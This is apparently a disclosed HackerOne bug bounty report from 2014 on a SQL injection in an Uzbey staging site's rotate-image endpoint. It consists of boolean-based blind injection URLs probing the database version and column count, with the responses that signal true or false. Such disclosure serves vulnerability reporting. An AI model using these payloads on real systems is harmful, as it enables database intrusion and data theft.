Uzbey: SQL Injection

2014-08-08T04:22:29
ID H1:23014
Type hackerone
Reporter yappare
Modified 2014-11-02T19:39:08

Description

https://staging.uzbey.com/rotate-image?fid=2841+and+substring(version(),1,1)=4 FALSE https://staging.uzbey.com/rotate-image?fid=2841+and+substring(version(),1,1)=5 TRUE

https://staging.uzbey.com/rotate-image?fid=2841+and+1=1+order+by+1-- TRUE https://staging.uzbey.com/rotate-image?fid=2841+and+1=1+order+by+2-- FALSE

FALSE = will redirect to access denied TRUE = redirected to page not found

fid must be a valid image id